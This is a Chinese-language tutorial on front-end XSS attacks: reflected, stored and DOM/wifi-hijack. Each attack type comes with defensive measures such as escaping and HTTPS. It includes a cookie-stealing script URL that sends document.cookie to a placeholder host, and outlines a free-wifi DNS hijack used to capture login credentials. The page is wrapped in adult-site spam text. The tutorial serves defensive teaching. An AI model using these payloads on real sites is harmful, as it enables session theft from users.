成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

前端安全之XSS攻擊

安全 應用安全
XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見的Web攻擊,其重點是“跨域”和“客戶端執行”。XSS攻擊的特點就是:盡一切辦法在目標網站上執行非目標網站上原有的腳本(某篇文章說的)。

XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見的Web攻擊,其重點是“跨域”和“客戶端執行”。有人將XSS攻擊分為三種,分別是:

1、Reflected XSS(基于反射的XSS攻擊)

2、Stored XSS(基于存儲的XSS攻擊)

3、DOM-based or local XSS(基于DOM或本地的XSS攻擊)

Reflected XSS

基于反射的XSS攻擊,主要依靠站點服務端返回腳本,在客戶端觸發執行從而發起Web攻擊。

例子:

1、做個假設,當亞馬遜在搜索書籍,搜不到書的時候顯示提交的名稱。

2、在搜索框搜索內容,填入“<script>alert('handsome boy')</script>”, 點擊搜索。

3、當前端頁面沒有對返回的數據進行過濾,直接顯示在頁面上, 這時就會alert那個字符串出來。

4、進而可以構造獲取用戶cookies的地址,通過QQ群或者垃圾郵件,來讓其他人點擊這個地址:

  1. http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script> 

PS:這個地址當然是沒效的,只是舉例子而已。

結論:

如果只是1、2、3步做成功,那也只是自己折騰自己而已,如果第4步能做成功,才是個像樣的XSS攻擊。

開發安全措施:

1. 前端在顯示服務端數據時候,不僅是標簽內容需要過濾、轉義,就連屬性值也都可能需要。

2. 后端接收請求時,驗證請求是否為攻擊請求,攻擊則屏蔽。

例如:

標簽:

  1. <span><script>alert('handsome boy')</script></span> 

轉義

  1. <span><script>alert('handsome boy')</script></span> 

屬性:

如果一個input的value屬性值是

  1. 瑯琊榜" onclick="javascript:alert('handsome boy'

就可能出現

  1. <input type="text" value="瑯琊榜" onclick="javascript:alert('handsome boy')"

點擊input導致攻擊腳本被執行,解決方式可以對script或者雙引號進行過濾。

Stored XSS

基于存儲的XSS攻擊,是通過發表帶有惡意跨域腳本的帖子/文章,從而把惡意腳本存儲在服務器,每個訪問該帖子/文章的人就會觸發執行。

例子:

1. 發一篇文章,里面包含了惡意腳本

  1. 今天天氣不錯啊!<script>alert('handsome boy')</script> 

2. 后端沒有對文章進行過濾,直接保存文章內容到數據庫。

3. 當其他看這篇文章的時候,包含的惡意腳本就會執行。

出現這種情況。

結論:

后端盡可能對提交數據做過濾,在場景需求而不過濾的情況下,前端就需要做些處理了。

開發安全措施:

1. 首要是服務端要進行過濾,因為前端的校驗可以被繞過。

2. 當服務端不校驗時候,前端要以各種方式過濾里面可能的惡意腳本,例如script標

簽,將特殊字符轉換成HTML編碼。

DOM-based or local XSS

基于DOM或本地的XSS攻擊。一般是提供一個免費的wifi,但是提供免費wifi的網關會往你訪問的任何頁面插入一段腳本或者是直接返回一個釣魚頁面,從而植入惡意腳本。這種直接存在于頁面,無須經過服務器返回就是基于本地的XSS攻擊。

例子1:

1. 提供一個免費的wifi。

2. 開啟一個特殊的DNS服務,將所有域名都解析到我們的電腦上,并把Wifi的DHCP-DNS設置為我們的電腦IP。

3. 之后連上wifi的用戶打開任何網站,請求都將被我們截取到。我們根據http頭中的host字段來轉發到真正服務器上。

4. 收到服務器返回的數據之后,我們就可以實現網頁腳本的注入,并返回給用戶。

5. 當注入的腳本被執行,用戶的瀏覽器將依次預加載各大網站的常用腳本庫。 

 

 

 

PS:例子和圖片來自,http://www.cnblogs.com/index-html/p/wifi_hijack_3.html 不是我寫的,請注意!

這個其實就是wifi流量劫持,中間人可以看到用戶的每一個請求,可以在頁面嵌入惡意代碼,使用惡意代碼獲取用戶的信息,可以返回釣魚頁面。

例子2:

1. 還是提供一個免費wifi

2. 在我們電腦上進行抓包

3. 分析數據,可以獲取用戶的微信朋友圈、郵箱、社交網站帳號數據(HTTP)等。 

 

 

 

PS:這個是我的測試,在51job頁面登錄時進行抓包,可以獲取帳號密碼。

結論:

這攻擊其實跟網站本身沒有什么關系,只是數據被中間人獲取了而已,而由于HTTP是明文傳輸的,所以是極可能被竊取的。

開發安全措施:

1. 使用HTTPS!就跟我前面《HTTP與HTTPS握手的那些事》這篇文章說的,HTTPS會在請求數據之前進行一次握手,使得客戶端與服務端都有一個私鑰,服務端用這個私鑰加密,客戶端用這個私鑰解密,這樣即使數據被人截取了,也是加密后的數據。

總結

XSS攻擊的特點就是:盡一切辦法在目標網站上執行非目標網站上原有的腳本(某篇文章說的)。本地的XSS攻擊的示例2其實不算XSS攻擊,只是簡單流量劫持。前兩種XSS攻擊是我們開發時候要注意的,而流量劫持的則可以使用HTTPS提高安全性。

責任編輯:龐桂玉 來源: 黑客技術與網絡安全
相關推薦

2018-10-11 15:20:02

2013-01-28 16:44:50

2017-06-14 16:08:31

2011-11-25 15:58:43

2010-08-30 11:15:38

2018-10-12 15:50:02

2010-09-10 14:13:11

2015-02-01 09:26:10

2013-04-07 10:11:27

2019-09-17 10:06:46

數據庫程序員網絡安全

2020-11-05 10:39:19

安全技術

2010-09-13 10:14:30

2013-07-26 14:59:13

2012-11-14 17:18:58

2020-11-30 23:37:48

ReactXSS攻擊網絡攻擊

2013-01-11 17:33:46

2009-10-28 14:40:01

2016-12-13 22:38:40

2012-12-24 11:10:11

2011-08-30 14:48:02

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 正在播放国产精品 | 国产成人精品久久久 | 国产美女自拍视频 | 成人在线精品视频 | 日韩精品 电影一区 亚洲 | 亚洲欧美aⅴ| 欧美国产视频 | 91精品无人区卡一卡二卡三 | 精品综合 | 国产一级视频免费播放 | 国产99免费 | 亚洲国产欧美精品 | 天堂av中文在线 | 国产欧美日韩一区 | 日韩一区二区三区在线观看 | 欧美一级片 | 久久一区视频 | 美女爽到呻吟久久久久 | 欧美午夜一区 | 成年人在线视频 | 久久精品视频在线观看 | 成人免费视屏 | 91视频一88av | 看a网站| 午夜免费视频 | 色偷偷噜噜噜亚洲男人 | 精品中文字幕一区二区三区 | 欧美精品首页 | 亚洲欧美日韩一区二区 | 成人av网站在线观看 | 欧美1区 | 日韩欧美高清dvd碟片 | 亚洲国产欧美一区二区三区久久 | 99re99| 中文字幕日韩一区 | 国产精品久久亚洲 | 国产精品久久久久久久久久久新郎 | 一级黄色片毛片 | 中文字幕av亚洲精品一部二部 | 午夜精品久久久久久久 | 亚洲精品一区在线 |